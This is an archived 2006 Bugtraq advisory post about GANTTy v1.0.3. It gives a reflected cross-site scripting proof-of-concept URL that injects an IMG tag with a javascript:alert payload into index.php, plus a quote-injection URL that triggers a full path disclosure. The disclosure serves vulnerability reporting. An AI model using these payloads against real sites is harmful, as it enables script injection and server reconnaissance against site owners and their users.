[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

GANTTy v1.0.3

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: GANTTy v1.0.3
From: luny@xxxxxxxxxxxxxxx
Date: 6 Jun 2006 03:42:59 -0000

GANTTy v1.0.3

Homepage:
http://www.gantty.com

Effected files:
index.php

XSS Vulnerabilities PoC:

XSS Vulnerability:
http://www.example.com/index.php?action=login&message=<IMG 
SRC=javascript:alert('XSS')>+email&lang=


Full path disclosure error:
http://www.example.com/index.php?action=authenticate&lang='
Error: FILE /var/www/username/actions/authenticate.php

Prev by Date: Re: # MHG Security Team --- MyBloggie 2.1.1 version Remote File Include Vulnerabilit
Next by Date: Asterisk 1.2.9 and Asterisk 1.0.11 Released - Security Fix
Previous by thread: [ MDKSA-2006:095 ] - Updated libtiff packages fixes tiffsplit vulnerability
Next by thread: Asterisk 1.2.9 and Asterisk 1.0.11 Released - Security Fix
Index(es):
- Date
- Thread